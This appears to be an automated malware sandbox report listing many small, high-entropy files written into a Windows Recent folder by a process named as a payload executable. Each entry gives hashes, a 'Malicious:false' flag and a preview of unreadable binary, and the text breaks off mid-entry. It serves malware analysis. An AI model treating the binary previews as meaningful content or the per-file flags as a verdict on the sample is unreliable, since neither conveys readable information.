                                                                                                                                                                      SHA-256:5AAD5317457846B1DC1FAB0F16265B00224AE97A886D1749F524C8DFAA352C63
                                                                                                                                                                      SHA-512:7414841666906D7031F81877F7FEB3E08F88CEA716AA72B9A7A0A6D5F01B215360C898DE996F2F8905DC76C88F955161EA81B00DBCBA979837BFA59DCCE322AC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DQOFHsd.'.q......'.../.Ag..x....J@.[....g.F.e.........p*.8-*.....N. ....](.*\.ao'3.Y>.qG..%u.4>.B........rB. ..."x........5..L....a.:......x.....z....t9.J.*..r..f...$.........t.....+Y........1J...N.i..$F..}E.^@...=.'&.....b.-.u.s..4./......... .u.D0..-.H.......k:#.....6!.T!q..}\...7...Z$.U!.m.0.1.v.mhJ.C@.p|.qR#...AV._."?^.|8...4Gj....l...(........H.t<..H.a...p./....X..f.?w...p.%..D........M..F.c...}H25..<.4Z..Wy.M..).uAX.C?..?...(@.7...R@..0.Y6Z..k.W......=...gZp..H.zE.5.1.....I...]"..*....%.p...........j.t..\M....S.s.0FkFl0... ;`.i.....C....7eN.{..o....!.-.[....T&...@.o.g........p2.xf.:.F....B.u..P.Q/).....j........Hv........"G.......+.?........}..z.U. .\:7...n .E\y......H.O.97.Rc..l.^OH.j.....+...M.9.'.ILh. J.{.Cm....v.(=o.../ .5P.`........D~....nC.b... .....C"..H..;#1I&1di...%u5..`.:....-".T..@.....j..>.S4..9.R.?......#Ft...Y|.......F.0...[....p..#......$...9q.T'9.pD0[..Cf....G.....y.F.)4....Q.T...[.lb.......zT.\.../...x'...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUUDTUBZFW.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859402777328497
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7+dMKQIxZqcOHQmwMysQIDBztqnDZRET8syFsiSb9jv62bD:kMDcHiqIfqDb5sySX9vxD
                                                                                                                                                                      MD5:491E872D8C64ECB781E45192481C1A37
                                                                                                                                                                      SHA1:4E6EB949B7F4DD64AD87349B1CE3CA7F24993C84
                                                                                                                                                                      SHA-256:48AC6BD059D088FD463FA07BB7A4D4ABDEE9CB9A2C7F0D9EC2F7DBC779EEECBA
                                                                                                                                                                      SHA-512:3ED7F334FD3728F2C571B15D459A8B2EF49BBC63E1AE4B959101D5A66290AD65636A5948AC1BD9843F87E8BBBF583A87F317E431708E1604E4DB3E4CEEF75F33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DUUDTRaU..~i..a..L}..Q..p.6a...0.%.t!h..l....@E`...G.Q..L.mk..X.&.ch.....N.6....j.v..n..r....A....L....#.Z..F.T..q.a...#..S..tf..1.A.......$GH.'..........K...G.(g.v/.2.|2.,..waF.....d....:...@ .x3...wl<....5..t.bv.......X.2.L.-....Z...~..'\K.w5....<....W.*WF5j...9.i..Ez.Q.U.L..7;.aFI...#....[....F.......Glz.9..FKVdw..\.z..^.............s:..pi(Id;...."..u......R,..j.i.0.......Q.;&...a@ ..+.......hn..c....C.....xxV...bR.J+.$y,.....U.....R\...L..7K.....I.p.v.../.3..Z...`a*...e.*..c(..Y..a~.h.d.YQ....3A..-..........A....-kD..?k.*.......:'.;.C,.Zq.lw..,(..J.......C.`g;...c\.P.t$..".w.h........H..\.?{.#..........:Q....*.l..w..?4[...2..~<......>hd..@..BF2A.y.J.>q.A.3.s....O%s.....0...* B."~th...8#..7Q...5....g.{..y.j4f..{h5..^$Y......X.g/^...".-.......L.8(.6.....M.....Em..)....i..|.jBkg).q.-..$......g..0....8..=..@B{..'.G.s.!W..[..gf...L!A.j.....~..&.......{/.4..Q..~......-..<c...o.cN.F...[..../..g.[.v..H..9.6...WZ.......C..W>.@.(.wj.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ERWQDBYZVW.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.848784568338874
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:XcqtTxIlxjfZzAy3ydCqVVXqMsZvcLMmBMM/f6G3ZlgIcvomOqtm9yg2bD:vFIlxhwd36EBBMM/JZlwv6m4GD
                                                                                                                                                                      MD5:67F905D779567D075B9B6A113AD44C6E
                                                                                                                                                                      SHA1:2DF13139209419DA0BDDA8493F07D1B00267E5D5
                                                                                                                                                                      SHA-256:4DE4277BEEF08AAB83881A2966F3F38899013BE56458F8539317F8E3DFE67E0A
                                                                                                                                                                      SHA-512:9B4F918369F0DEC8FCD03746A872EE0BDF440A331661AA07AB43FCA680EE5EBA7DA329B47855C8E1195AF5F9C0C5449E0994F2C3236A9F4AA226F6C215D20296
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ERWQD.Gs[..sz.`C.9..o/..W..G..Q1C..WfHBVo-}..Y......B..=%..r<..\.....Q.....d...qU.^.....!......9HA........(....".;...D.V..>"U....!!2%..Jg.X....Pz.^...2).U.n.c...H.j[.....gF.7.....xs.L.......N...G..z3.iK^....u'.E.YE..WE]..Z`+..r7....................D=....4...,......Qk.-..'..i;.<^nt4.k...5.!{^........>.c..|wf..?..#.\....{....6...*l.....5~q.)...x...^........\..l.. ..HMt0..|.. .......!x.c.s....n..E...9...)..\)..K...)..b...:..&kv.S0[.+...&.!.../Y..{CQ&.'.!=...{._.z.}.X}..LA....!h.KV=...HoV`. h................Nx.=....Yb+.kY....z..]Z.........V.X...,g..N.......jJ..[.; D....}gc......{../.d.Z.r_|..I.2%d....EO.Ilx.H8....J>O48..8e.v....%.i..x..e*.........F....m4.....K.lq?.x......3.../.{.B....C.K...Sq..\.........d.Gh.:a..K..[.w...`.B... ...^6.........B..R.s..6$s...SC...;.Y!-.I.K..9..t..o@.....C...yF.OJv).`............O...p.[.}...~+.o..(..F:..10C.&...L.h..K.=R........r.}...jW.!A..].W......w.....(.Yl..;2.V).3..{"`R4|.D..>.~^..sbw..Q....2...^..L.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FAAGWHBVUU.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.851465413244001
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:uA5hOJlQa4O8kqUYS60xwuM71rlX6BCIz6iuxUoTqB+2bD:PKgwqJsIvX6BzAGD
                                                                                                                                                                      MD5:D95F12F25E6DC5C4F53C44F144C29AED
                                                                                                                                                                      SHA1:F60705932B5234C286D6744470C3212E52D2BDB6
                                                                                                                                                                      SHA-256:EA4BE21967A4DD715602834F9853206454C8DAC8DB3C926A31CBA60E867E77A6
                                                                                                                                                                      SHA-512:8B0BEE2DB683A01031AC197CDB314E8CDCC1DACA5557310B11580F5342A882759D8C05D3867C8BB604A3580FB64B3191C4568D65A4B1FF487A7D7C1AD736041D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FAAGW.j@._(.....o..o.........H..4...g}T..q.iq.L$.Y...4OV....V...Y......^(L[..........Yk&...(..G.Od.....v..pAH.4.Dw{u.Q ....i.._.cT)d.$.c.W^.L.>...D.|......'T..)...d..yN....o....6...H~.......[.3....ix....5a.m..........b....7S..ndg....ly....%:....]s."......d{%c.....1..D.~4!R...9.[. .Z...P=}.P..1,:.H.....{U.,.%.yv...M..y...#[...o.:..<P+..;u,....:.Hz. TAw6..4...$....q_(.........d......+i.A^....r.)..J..Q..Z.d<......'..d3....B.B...X..-.e.Q.e.s.T..sV({......?~....3..P}..B...s......7.d..K.....[.Z..-..>u.A<.....D".....:L...B.......0..8<.O....~u.Z.Ql).b1...1.p<..@...+D...I7T.iP|.P.vy..3."...x..".....DF....z...........nw.F..|..@.G...8.esB1.Dt..a[...z.|S.......~.!8..8p.e'A....B.s..rbu......>>...H......6...,[n-.%...(...+ W.Z1W.....F.<..d9..7..V..l...Sn...l..[.~.........3....5~[H...)..%.^...q.H)../>h...B....Z.'..fA.Y...7...eZ......c.K.n?..j.2\..k....N.$.4.R.........X.5.s.h..^X%..>.....o_Q....:%(....8Dek.....o.E.......\pe.OQ>........;\Y....9.....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.86727791606907
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KV6LdwGGaGbaeuL2rw73q4ZLy960GWTi5UgNw2hDDrCplzfbRIeF2bD:W6R3NGZuL2rw733Ze9Qsi59W2hDDWpli
                                                                                                                                                                      MD5:6A8F99FB38386CA13D19A3D4B7CB41F1
                                                                                                                                                                      SHA1:4BF5DAD42E2BD5984FEEA7BDA0DF8A018C2ABAD2
                                                                                                                                                                      SHA-256:DCD215FD77617111875490450B77C9E7663AD65578C91D6777EC37D9311CDE08
                                                                                                                                                                      SHA-512:6523EF603030AF2EF32700A0683BDB8CC337A2D8E1167B5D99D00A81B035F4B6C4F888F1192C0A229726C27AD986CDE929EED94E10AE5ACBB46E0C0766559472
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIVM..).t.)..z..D$<.w..!_`..Y......`]c.....?=+R.V.......n;.Y1..%%.r<<hF.e.7..w....X.B...wx.._...$2....U..s112.c....=Y...u...,....5.$sz...oA..v.v...Bt.....P}P=7r...Ql&.J..}VI.O.@.1HYW"p.p....o}..8... ...++..K.......r.R9G..3q+...4..+...k......QV..E...Q]..........i\+.k=.;.?....v.$U..E.....Y....O....*..d..f.......[9..H..* .K.j..s^.C..{.@...U."DX...(.5..;...J...C.a8......k.\.S..C.`.p.B.S7syM2........@#B......,..6T.......t.'.......D.....t~...w5.O............|....#.|......:...u....".t.h.o...-....k...lu[.I.!..n.seS.;C.....<..A.Z._V.....i.I46.''e..I.........K..^.L=.j..=..F....0..O~.<..K..m...Y.?.b.M4...'....../.q.6....}.6..R.u.92d.E...d.`8b.7..Dv.Y./22..N.W.Q....F.>....~pW..h......l..bY.[.. >.lw....1....h.P[6\...C)........m.H8..}5...%V.MG.m...Y.<....{$.3..i.6..@..}#D.C..,g.9.#...:..T.7.'!.N.sG.a....{*Hu.+.5.......<.!,.!gw..Z!....o.e6Q..m.....a..v...<.e..v4z....!:......2u)ei.*"7@Q.....{e...?..Y..-.^.2gc....+5.q.(.D.?........................,....c_....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.829450412266599
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:eIIWFJLkhX79ilbGEQ+0gECwA6Ry1zDr5G1z7QIrExyW4LJyIdjAho2bD:eTeGhJQNJ0ZCh641zxGBJAx2JyIdjAhX
                                                                                                                                                                      MD5:1636BDE2FFBB38E05F6FBFAFE7B2C8F8
                                                                                                                                                                      SHA1:0DF7325C44539F8C597BE23C67D6F201A91BC041
                                                                                                                                                                      SHA-256:5A3E08068B486C0AC17EA966B3B733D174A39873E14F98291C2E8A8391952E2E
                                                                                                                                                                      SHA-512:FD93469D1C535728AFA45D093B2727529F8EBF1BAD027EAA8CB53A862C5A940517DC3E5FF3F62C3C6D5AC55BC970EBF183C9384442FA53F46273E7B09BA3CA75
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIV..V.A..K.H.^.......9.Z..&....qs..........)."('......s..gZ-&..o...n~N.......s...vjF....b.}.g...C?l."....G..V.....".............C.}xD.{=BZ....".A..)h...Z.@a.....?s...U..,7-.FQ.P.:...C....A..d...h".g...r`...*........=.F......4.3i.x.G.XU.9....|-.%.....U..%.^..!.6jKk"..[zU.|.....N2<....LvR..H..a.-s.q0.....a.U.N.....Uk.Bw.+.......Y.$..b%.e..d<..Z.^c..Qo..@......\*.de.Jg.._n....N..f.N...@\.-%>L.......AV.d..~...`i..y.P..1+.z....\.p.....+i}x#...F.Q?r.I....9y6]..^..<..... .u.*..r..zKIZ}<.~.<..A.Pb...kQ.c........3..GA....@O3,9..u..`...3C.k&.g..;._.M.?N.......)t....p.n..\.LL...s^..H.....8.zq...mD&5"f.......R..9F..s.,7.:...y..DG?..#..Z...B........qB/4.n1....xF.....w.#H...H.(q..1.....)*Z..hp.{G......U+........Kh-...n....R....,.I.Y..1.....R..b..N..%..P.o...2.......?..O....=......R.e<o."..F#.O..+.,...O?.(...>.J...........w..5.LQG.!xn...c9...v.....v.)..iL..&`vo.)f.n(z.k...Z....J....j..b..12.m....9.#....^...8?..V...xvE.m+L.x. ..'Q.S.GT...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.841898267567028
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:T6oAPqDT7/CwxdYAccNzXeNOOMc5Q5bolbZzxmS44SxmVU/86xZvkECs6JUx053a:TqqDnqwxyAc6Xc25boJZdmShCE6xZnHN
                                                                                                                                                                      MD5:D94FBC97D87A36170AC1528FEBD61C50
                                                                                                                                                                      SHA1:0ADA6D29B53529659544A4DBB0A97F22F6A9C3BE
                                                                                                                                                                      SHA-256:40E5289FD269D236A4FF13CBF37F01C5898C9B413CF97D26CEBB0543F85A186C
                                                                                                                                                                      SHA-512:D5503F47283FB555BFF5CCFA0AC2EB0BF638C4C0568769FE4A090D05DC0A134820E1413B4E39B4C89E5611A55921345EB6E8CDBC4FAB22F896A0920BA7B1DAE2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIVf.$..oJ........V %.1.....=9.....u...1..$.....fnM."..ET..4.....v.{.e.Dw.c=...k6&..{n......7t.....o...D.<.T...=..v....M...2E\*.7 W..!_:U-}..t..-.N...Q4K....yUD...<..8.....+.{u...uc8..2.U........b......} k..,.).+.. .&I..."RJu.3...O.f0..r...f..j.....J..U|{..q.55D...LK...s^LN...i...9.J..B].p.;...}.....?..4Z.L...(.:.cm.6A2..u!.4.._.A..=j..0\.b.....o.$.7..c+.*..f...h...H$..z.....t.....W.KwZT2.h..p......P....akP/e..b....(D2c..)\.......Z.....i}.....&?..O^.;..y.Y.;!....4.hD./;...u.$."Y0BI3,"u.T.D.Qaf.,....C...o\.....e`....c...W2'a..#!;..T..O..2.h....1.G.s.B..OPEme@r.MHc....Z.c-=6+matU...n..W:..|............=.5Mu.;...+.Z.ho{V.9w.D.....WZ.i._.X..dzv.N+.!..S8e.G.4..rP}.0....1..."......Ph./.T...B.9.n..*..r.....!..ul.TSL;..Xu.....!Y.k.....4...w.%...........U..+..A.....5..$.i*..d=_@Z.....'5.S........\..H.....n.8...8..H2R.w(x.%;.Y.#u......4Fr...mo.m....>^....2@'i3.......!..G.3....?.g.$!.....".V....k..w.b.`>..RP......R.....e........&~..6.a.8.....i"..?.t.u..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85182226381783
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:g/DXiEjt9DvuuQ1vQ0cuW0CMfCadN/u10ddmNGxI5UWFQ6oFOf2bD:6WEHGuQnC0CKCadNvBZQ8D
                                                                                                                                                                      MD5:459962ED9B5FE957B51E0B8BBD44776D
                                                                                                                                                                      SHA1:E63BB722548F7C111CA39A15453BDBA99BF83EE5
                                                                                                                                                                      SHA-256:6A9C53C74986FDE1BCE774678FD5BA7A6C55B8120FAF71D3A098609E781CC6FE
                                                                                                                                                                      SHA-512:44F4E1CF9C76CCC1BECB60E2EA4B6D7BD47B5441E0CE2ADB21751A779F9E164B1B9365A06C292003AEFEC3696B65C921DBD293174DF7CAD2363FBA1A324E473C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV.........t....a35w-...M....,.f..DL%.>!.9n#x..'. .['...Y...3v.R.9r.V...'.v.P....^?..K...^........}s..Y.R.[xe)...s....].2...:.8.y.0+.0o......Y..R..........a.t...y_.#4......-.....~......3j.q.<\.<X........v.....i..P....@!....b1./T.v.o.XB@.E....@.O..a...@6....}-~.....+e.Z|R?.qp..G.Z9.........7l...5./17......'..&z..+.M..*.......y6.v...z\.A..r(.j.F.)...}4..}....6...:..g.v....$f.d.s#...".......<`....U...k.nPAX.@%ON..K.Yn@.?...T.&]... ^o.P....]....:e.%sZ%..|.[...S...y..N../.<...3du..Q.U4Z$A...oN.......XZ.-....V.$V..8..H.`.@3.....Y.uz.}..S..J...........[.q.9.....f.^.-]...$...>;.m.D.6..9..........U.][.T'.&.u..h..;.O...Y8q+.-E(.T.JB.y*..t.H.a.F%& .2.IE..L2...d..zkd.c...d.AC.......A.*O..L.......4.@...%&/vO....s.I......L20m'...o.._...\AH..w.2C..b...$..X,[X.T...o...t(..9Y.'A.2..[.E.....Js.....rS.7..l...6<.a9...(.......u.........g.V......=..u..g1\.|.c~.j.<....4....)..c.lf.I...22-.-(....G..S..jC.&Y....EE.I.HG.}...*....+N..TK....c.%mnW........I..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.861164382262813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o2c97fQFJdmhWYf7K2Fs6Qz52vPx1Sq2NsfCUX92moLo0hw6piGp8lGx2bD:o2c9U5lYjK8s6QN2v312KfzALoHuBp8B
                                                                                                                                                                      MD5:ED13FC8C00E2AE7A6BE35B66FA969342
                                                                                                                                                                      SHA1:8A1A294F09D3C4983155B80A1CEA5BB37C783B5A
                                                                                                                                                                      SHA-256:7609375681B3AAEDFA07373F83A0EB5D9449FD01DCE0DB084010423B1EFF6B39
                                                                                                                                                                      SHA-512:E41A5A6B5A505388D7B5D72D5516C22B363E5040ED6F9E30C40A80AD93F911928827DF3D9ABF632768A3558F69B888C726AACACD659B70CE60ED0B6756BAA8D4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV{..y.!...../..2a...Vs..[t...E.~{a.H....@.G..cv`p..\..l5....K..V.\h2..q.R..c.......*..).a.OIx.`.......t.!.y[...5M..U.$w..I.......-.U.v.'........V*.+8.WrQ..u...&w@....."./Q'.?m..~N4....E.....W...Bt.1..uc...g"].wk!.F.;.5.fhN.g...~..e,..#..S..b._R....`.. ..q;...MX.....<..Bz......x..\..H..`....1i..P-...f..Ls>...'cv...td.l..4;.x../E..i...u..n..H...g...v.2....u....Fy 9.th.C).......Gz.:.E.(|V.D.b......(O..j...s.j.3..0...C.O...G....'.._.xc....F.o.S.d..|2rG p.V.....Y!Ig...H....V,8..w..\...=2...W.....6=...I...vT......6g.eP-.L.$....[..a.....0G`.vS..o...k.9.n.....b.).$.]...).H.6..Ll..L..o...H .)a\...X.04......t.+k...*...s.y.[...{5n{I.Q.....=Vtp...yY$...>h[....U}.....m.=.....I.J.}.....+.Q....'......[....95.y:.....O..c...C.$?)....D.`<Z..7.v...A.bA..o...`.a....Y...Qr._..NG).Xm..i!.D.........rhJ..h.._....O...5Z..../..M....k..a._.b.bN.}lcC...c......w.]...uL#..@[.`H..t._..we7.0;WzN.%."?.u.~..FhEv..I.W-..wB4..bRp._...t..*.J....{../...'.EOT....B4

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865374575799541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:u9DYLarZ8QUbc/aoL5MWhfemJMsU8mujh3Ae9hzUuK6rf8AxB8Hp4IAWLpU2AwpP:2Drt4ho9vEmJu8jQuzUuNr0Ucp4nWLpt
                                                                                                                                                                      MD5:F2AF4032C0B0AB7319C0EDA34546AAF0
                                                                                                                                                                      SHA1:C62775D1F6CBD57E251191D35FB557581FEAB8A6
                                                                                                                                                                      SHA-256:36E12154174A8AA9FB11B1D2D3AEAC5F6942E0D0FE2EEC27A4049092A7B8CE6C
                                                                                                                                                                      SHA-512:70C5DAC31FA41CE942524F80441428284D7EE1BFDF38ADBCB94BB238A740077C490849A18DEFB45E0AD5D814DE570FC7E468A4DAD2A8B74F11C9652D9765D105
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGVd...s..t..y.!....`\s]..G......O.R\7......f.bt.+.b#.......->#.G.5..A...).r...U$.......L..(,.|..AA...3.K.M..rw+.....DK.E...:\[.z.O..'.........#..6..... ..._.y.2.j pj........m...IV..,.$P\...].....*...-.x...).(.../.R^J.S'...%......5...1....)9.i.H...^.+T..T|...~....Ah..W.........$.<v. ""..0.N......6.W.M..g...3.p...zh...q....u._z....[&}u..e..n.k0..k.50...)...ii...2V.{..M...Gb...>....N...9..'L....C...y..d*:.o.......}.".7\.......6_.....=.L5).N..u..!.....{.......&i.!..'.D.....)W.E.}K...;x....V.$H...4.n....i...S....t....UC.b(_......#..:..i...#...Il.N+.R;...>%.rd.O.KlDj.<.%......0....k...^.2.....|...3...G........)n.k..=.|.B.{......~.~sl.#..`.\.H....RP.`g......d/../..f..4c.b.f/...^...k5u..o7C.&.o.|...2..6O%....S9:.k..f.O.<P...6....a+....H..hJ.Ny..US....aD..*..sk8F.C....^..hN+.9...h.op..f..Jw..7.@.|R.7w4.@...(Q.j...........%..jY.6...........:6.au....Zxm....,..w..q?3..Z:%.....~Z.2 ]!.~.T......yc.z......(.J...&.....t..sB.x .?@m...Q...]..|&V5...b...| M.%%..J.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IKCRSXYNJM.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865111679950312
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8vvNa+8W8bjltmpOcmCAFnKbWdpTBvfmeteo+CTFvFoqrMQjh2bD:+1J8WAjzeNmCAcbMTBveo5FvEhD
                                                                                                                                                                      MD5:07B611AC44F9845806114F7D8EAAB3E2
                                                                                                                                                                      SHA1:49903FEA54198C000A4B57DFBA64503D5C35AEBD
                                                                                                                                                                      SHA-256:A9BA7AE72B3A62D3F487F3D3BA367FE101997C89634AE32A8732F193500B8C1D
                                                                                                                                                                      SHA-512:69CE820A85BDAB8D6B6498B0A57869C241A428C413335A66F702579A46F8BB64F9F5C853D0C407C73DAC1854DF00F31655670EC6AD5FAA240B417CD469D72293
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:IKCRS.P.......x.J..L?.X.)P.../.E......s]..B..U.....o...... .......<....S.GJ...h..'....MM.=<-k.....4.]@.^.....k....Hss.D..x..2...X%.W...-....0..y\{c.$o..._.r.<..>..;.%./.I?.N.......L.>.f..;8.]$..m}......&...Zu..a9..k...S`*.f..V.......B%....Q.Ua.c..0S>.%...T.K.....E.....^h>..Gl........j.....F.Yig....L..BP-z|.hV...S^.....&...z..."4B..M..|.B.:...7......WI0..t......W.B..."S]K.*}r(1.}..6{.X.c7../,.....d........>h]..Y.2.~.'M.......OIJVr.A[..Z....b.....;..{.^.sI,.M.K.T.Z....K.m.M..Y...7.m>...".{...'...o]...6.%eL..=...zV.....y.R"...b..j9ugx.F.)..2..... .,..6Q...vz...|..`Y....z%.q?..[I...).....J9...1.)...J~..e......k..[UGH. f.8...h.~.#..*...U.*...s.SV...t.~.sW.h.;...Z....Z.&..R.?..7=...x....!.K..........H....>.+!GG.^j.%..=.w$.B9:..l+d....\_.A..w.|q..w.b.C.B... .;.A...l._..H6E..MX.E...8..7@.g&9....{.*.X...Q.|T.~F.%#I.&}..s.a76..[.1i..g.U.m.?6|@....."./..{-....m.@-.-...v...s..NV.......&v.......65.....d.... [.............Yq.....3D"F..]a.u.T.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IPKGELNTQY.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8340888716771175
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:MiyLhCOWj3verA1qWD8/JyKr64r3gUNWWy+GpG0OhZykISorYCtBNPM2bD:MiytC/verAEWp23MWyXc0xk0rVtB1fD
                                                                                                                                                                      MD5:D83CD7923F01B1D5A63758F1DE9152DA
                                                                                                                                                                      SHA1:09562BF077EA16670CCA33EB1DD2D791DFAD9400
                                                                                                                                                                      SHA-256:E27A574E1A5839F4A2533A34D0D8E7EC692D782E4F673309DD6B08402FC94FEC
                                                                                                                                                                      SHA-512:F5398580C55832C54FBB9D4E360CB1AFC4BCDE71746DC7C32B0776821DBF79040E1AD0E3979AF9158FBDF767ABED243A0310F39FAFB0558A492218FA1727D677
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:IPKGE...t.N....7.\..@%...i.....uk..(.T...Y....:.S/.....e..F ...?$..n...l.3.4o.g.c.4.....P.x6..x[.f#..2..0....2....p.*......O.k.i9...zt;.a.....I.9.U.c..5...aYlo...Tf.m..-.H.V.....iwU..MR..P..B6.@.Y..YQ.&9..I......#....?..sN..3[u.}V.......8.L..9.^.TM$......m.....A&...#..x..Sr.c>.#.{I.......m=9..M7l..`.\........a./..h..L.8..ST...j.W(.*..#|.n.".Trt.B+....`...>...tW.[~,i.,.)..?.6.].....k...J....../..!1N:b....p]rT.....iO.V..g..5..E...u...S.2).AmN9.G!.....`&1..I..v~...pz......m....LO...S...Q+...&}.K.HPD....C`....,.H..m.P...ei.ZE <..H.Vw4.".q..(..~1..<..~.{...<...j..`.T..d.E.........8...e...I..c..E>..;..=.)......4U'.5.'...t.V.:..d..V+..h..o;<..;..o...6........'x.ex...4..Pbu...[..A..l4........k`..N..q.....0....?..E..V...-....7.O.q{....L:.0..P....~X.....4..P.sG.{...z.0Pm....$u0.."..#_q.5'U...Z..t.3..8G......}...ZF6..p...."1fOe...3q...{..E.Dv..QU..a2..2......NA):......i.,b.dB..y...),......c.....Qd....i..o..[.*oWV..w.wB.dA...>..8.#..7$;...f

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IPKGELNTQY.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8626290067470945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3IaDZTz8DRvBT1iMz2Wr1FlxOGi1YwibxtBzjvnk62bD:3DdTz8d91ig2iFlxOgwiFD/vnkxD
                                                                                                                                                                      MD5:7726C73671AE0D8263BAA5B9F3811DD8
